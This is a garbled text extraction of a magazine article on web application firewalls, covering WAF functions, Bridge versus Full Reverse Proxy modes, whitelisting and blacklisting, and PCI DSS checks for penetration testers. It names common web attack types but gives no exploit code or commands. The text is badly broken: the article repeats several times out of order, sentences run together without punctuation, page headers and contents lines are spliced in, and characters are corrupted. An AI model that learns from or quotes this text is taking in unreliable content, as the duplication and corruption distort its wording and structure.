After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be abused via SQL Injection by entering inverted commas (single quotes). It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without analysis, as this would lead to misjudging the achieved security status: filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all conceivable threats. In this context, too, penetration tests make an important contribution to increasing web application security.
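The caveat that filtering special characters does not always stop SQL Injection can be demonstrated concretely: in a numeric context, an injection needs no inverted commas at all. A small sketch against an invented SQLite table, with a naive quote-stripping rule standing in for the WAF filter:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, item TEXT)")
conn.executemany("INSERT INTO orders VALUES (?, ?)",
                 [(1, "book"), (2, "laptop")])

def strip_quotes(value):
    # Naive WAF rule: drop single quotes from the input.
    return value.replace("'", "")

def get_order(order_id):
    # Numeric context: no quotes are needed for the injection to work.
    filtered = strip_quotes(order_id)
    return conn.execute(
        "SELECT item FROM orders WHERE id = " + filtered).fetchall()

print(get_order("1"))           # [('book',)]
print(get_order("1 OR 1=1"))    # both rows come back: the quote filter was bypassed
```

This is exactly why the article insists that a WAF must be configured on the basis of an analysis, not just dropped in front of the application.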
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements towards the client browser.
In order to protect web applications, WAFs filter the data flow between the browser and the web application. If an input pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
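The general parameter rules described here (parameter count, maximum length, valid characters) can be sketched as a simple request check. The form fields and limits below are invented for illustration:

```python
import re

# Hypothetical rule set for one monitored form:
# parameter name -> (maximum length, regex of permitted characters)
FORM_RULES = {
    "username": (32, re.compile(r"^[A-Za-z0-9_.-]+$")),
    "quantity": (4,  re.compile(r"^[0-9]+$")),
}

def check_request(params):
    """Block requests with unexpected, oversized or malformed parameters."""
    if set(params) - set(FORM_RULES):
        return False      # more or other parameters than the form defines
    for name, value in params.items():
        max_len, pattern = FORM_RULES[name]
        if len(value) > max_len or not pattern.match(value):
            return False  # over length, or characters outside the whitelist
    return True

assert check_request({"username": "alice", "quantity": "2"})
assert not check_request({"username": "alice", "quantity": "2", "debug": "1"})
assert not check_request({"username": "alice' OR '1'='1", "quantity": "2"})
```

Note how the third case is rejected by the character whitelist alone, without any knowledge of SQL, which is the strength of rules about parameter quality.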
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. It protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Moreover, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed to the web application.
Figure 2. An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; whitelist-only approaches therefore quickly become outdated due to the constant tuning required to maintain the profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags, to the administrator, entries that potentially violate the policies but, based on extensive heuristic analysis, can still be categorized as legitimate. At the same time, the exception profiler suggests exemption rules that prevent a similar false positive from recurring.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode, the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and can therefore be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, potential attacks included, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it sits in line and uses both of the system's physical ports (WAN and LAN). As a proxy, the WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, i.e. the rewriting of URLs used in public requests to the web application's hidden internal URLs. This means that the application's actual web address remains cloaked. With proxy WAFs, SSL handling is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avert Denial of Service attacks), as well as authentication and authorization.
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks that attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk assessments and test processes intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism examines the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
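A checker for outgoing PAN leakage typically pairs a digit-pattern match with the Luhn checksum to cut down false positives on ordinary digit runs. A minimal sketch of that combination:

```python
import re

# Candidate Primary Account Numbers: 13-16 digits, optionally separated.
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,15}\d\b")

def luhn_ok(digits):
    """Luhn checksum, used to distinguish card numbers from other digit runs."""
    total, parity = 0, len(digits) % 2
    for i, ch in enumerate(digits):
        d = int(ch)
        if i % 2 == parity:      # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def leaks_pan(body):
    for m in PAN_RE.finditer(body):
        if luhn_ok(re.sub(r"[ -]", "", m.group())):
            return True
    return False

assert leaks_pan("card: 4111 1111 1111 1111")   # classic Visa test number
assert not leaks_pan("order id 1234567890123")  # digit run that fails Luhn
```

A production filter would of course handle more formats and act on the match (mask or block the response) rather than just report it.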
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since a WAF by its very nature stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. Here the principle of least privilege applies: users are awarded only those privileges they need for their work or for the use of the web application; all other privileges are blocked. General integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products or, even better, a management center through which administrators can manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar configuration processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Reverse Proxy mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data where the web application has weaknesses the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, who have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even to external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but, above all, expensive. One example: a program that has until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use just the session attributes for authentication. In such cases it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
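The session-fixation point above can be illustrated with a minimal, framework-neutral sketch (all names here are hypothetical, chosen only for the example): the mitigation is to issue a fresh, unpredictable session ID at login, which is trivial when session handling is centralized and hard to retrofit when it is not.

```python
import secrets

# Minimal in-memory session store; this only illustrates the principle,
# not a production design.
sessions = {}

def login(old_session_id, user):
    """Authenticate and issue a FRESH session ID.

    Reusing old_session_id after login would let an attacker who planted
    that ID (session fixation) ride the authenticated session.
    """
    sessions.pop(old_session_id, None)        # invalidate the pre-login ID
    new_id = secrets.token_hex(16)            # unpredictable fresh ID
    sessions[new_id] = {"user": user}
    return new_id

# The ID an attacker may have fixated is worthless after login:
fixated = "attacker-chosen-id"
sessions[fixated] = {}                        # pre-login session
fresh = login(fixated, "alice")
print(fixated in sessions, fresh in sessions)  # False True
```

An application that routes all session handling through one function like `login` can adopt this fix in one place; one that scatters session logic must be analyzed in depth first, which is exactly the retrofit cost described above.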
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can clarify whether, and to what extent, the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or weak spots; the shortcomings are frequently only uncovered over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot simply be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
WEB APPLICATION CHECKING
Page 40–41, http://pentestmag.com, 01/2011 (1), November

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of an application-level firewall (ALF) or application-level gateway (ALG). In contrast to classic firewalls and intrusion detection systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas (single quotes). It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis – that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
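Why filtering special characters is not always enough can be shown in a toy sketch (the filter and query builder are invented for illustration; the concatenation is deliberately vulnerable): a payload in a numeric context needs no quotes at all, so it sails straight past a quote-stripping rule.

```python
def strip_quotes(value):
    """Naive WAF-style rule: drop single and double quotes."""
    return value.replace("'", "").replace('"', "")

def build_query(user_id):
    # Deliberately vulnerable string concatenation; real code should use
    # parameterized queries regardless of any WAF in front of it.
    return "SELECT * FROM users WHERE id = " + strip_quotes(user_id)

# A numeric-context payload contains no quotes and passes the filter intact:
print(build_query("1 OR 1=1"))  # SELECT * FROM users WHERE id = 1 OR 1=1
```

This is exactly the gap a penetration test should probe: the WAF rule blocks the quote-based variant the tester found first, but not the whole attack class.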
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an input pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, the valid characters and the permitted value range.
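Such parameter rules might look like the following sketch (the form profile and field names are hypothetical): a request is rejected if it carries parameters the profile does not declare, or values outside the declared length and character constraints.

```python
import re

# Assumed profile for one monitored entry form.
FORM_RULES = {
    "username": {"max_len": 32, "pattern": r"^[A-Za-z0-9_]+$"},
    "password": {"max_len": 64, "pattern": r"^.+$"},
}

def check_request(params):
    """Return True only if every parameter matches the form's profile."""
    if set(params) - set(FORM_RULES):        # unexpected parameters -> block
        return False
    for name, value in params.items():
        rule = FORM_RULES[name]
        if len(value) > rule["max_len"]:     # over-long value -> block
            return False
        if not re.match(rule["pattern"], value):  # invalid characters -> block
            return False
    return True
```

For example, `check_request({"username": "alice", "password": "s3cret", "debug": "1"})` is blocked purely because of the third, undeclared parameter – the case described above of a form that suddenly receives more parameters than were defined.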
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A mature rule set for request rates, with finely adjustable policies, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed to the web application.
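The request-rate rules mentioned here reduce, in the simplest case, to a per-client sliding-window counter. A rough sketch (window size and limit are invented policy values; real WAFs offer far finer controls):

```python
from collections import defaultdict

WINDOW = 10        # seconds per window (assumed policy value)
MAX_REQUESTS = 100  # requests allowed per client per window (assumed)

hits = defaultdict(list)

def permit(client_ip, now):
    """Sliding-window rate limit; pass time.time() as `now` in real use.

    Bursts typical of Brute Force or simple DoS attempts exceed the
    window limit and are rejected.
    """
    recent = [t for t in hits[client_ip] if now - t < WINDOW]
    hits[client_ip] = recent
    if len(recent) >= MAX_REQUESTS:
        return False
    recent.append(now)
    return True
```

The 101st request from one client inside a window is blocked, while other clients and later windows are unaffected – the "finely adjustable" part in a real product is tuning `WINDOW`, `MAX_REQUESTS` and the reaction (drop, delay, CAPTCHA) per URL.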
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; whitelist-only profiles therefore quickly become outdated due to the constant tuning required to maintain them. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order-entry page.
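The combined approach can be caricatured in a few lines (all patterns, paths and names are invented for illustration): generic blacklist signatures apply everywhere, while a strict whitelist profile guards only the high-value sub-section, where the maintenance cost pays off.

```python
import re

# Negative security model: generic attack signatures, applied everywhere.
BLACKLIST = [re.compile(p, re.I) for p in (
    r"union\s+select",   # SQL injection fragment
    r"<script",          # reflected XSS fragment
    r"\.\./",            # path traversal
)]

# Positive security model: a strict profile only for the order-entry page.
WHITELIST = {"/order": re.compile(r"^item=\d+&qty=\d+$")}

def allow(path, query):
    if any(p.search(query) for p in BLACKLIST):
        return False                       # blacklist applies everywhere
    profile = WHITELIST.get(path)
    if profile is not None:
        return bool(profile.match(query))  # whitelist on high-value pages
    return True                            # blacklist-only elsewhere
```

An ordinary page like `/news` changes freely without re-learning, while `/order` rejects anything outside its learned shape – which is the trade-off the paragraph above describes.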
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that appear to violate the policies but that extensive heuristic analysis suggests may still be legitimate. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as a Bridge Path) or Proxy Mode (as a One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and some special functions are only available in this mode. As a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which serves HTTP pages over HTTPS without changes to the application code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, i.e. the rewriting of URLs used in public requests onto the web application's hidden internal URLs, so that the application's actual web address remains cloaked. With proxy WAFs, SSL processing is faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to mitigate Denial of Service attacks), as well as authentication and authorization.

Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult

Cloaking – the concealment of one's own IT infrastructure – is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured accordingly; penetration tests help with the correct configuration.
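URL translation and cloaking can be pictured as a rewrite table plus response-header scrubbing. A schematic sketch (the paths, header names and functions are hypothetical; a real proxy does this at the HTTP layer, not on Python dicts):

```python
# Hypothetical public-to-internal URL map used by a reverse proxy.
REWRITE = {"/shop": "/legacy-app/cart.cgi"}

def rewrite_request(public_path):
    """Map the published URL onto the hidden internal one."""
    return REWRITE.get(public_path, public_path)

def scrub_response_headers(headers):
    """Drop headers that leak server details (cloaking outgoing traffic)."""
    leaks = {"server", "x-powered-by"}
    return {k: v for k, v in headers.items() if k.lower() not in leaks}

print(rewrite_request("/shop"))  # /legacy-app/cart.cgi
```

The scanner probing the site sees only `/shop` and a response with no `Server` banner – exactly the information a reconnaissance scan would otherwise harvest.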
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for possible exfiltration of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management, where the principle of least privilege applies: users are granted only those privileges they need for their work or for the use of the web application, and all other privileges are blocked. Integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, and easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products – or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar configuration processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses that the WAF cannot compensate for. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's web application security and application delivery product lines. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest Magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
- Cover
- Editor's Note
- Contents
- The Significance of HTTP and the Web for Advanced Persistent Threats
- Web Application Security and Penetration Testing
- Developers Are from Venus, Application Security Guys from Mars
- Pulling the Legs of Arachni
- XSS & BeEF Metasploit Exploitation
- Cross-site Request Forgery: In-depth Analysis • Cyber Gates • 2011
- First the Security Gate, then the Airplane: What Needs to Be Heeded When Checking Web Applications
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
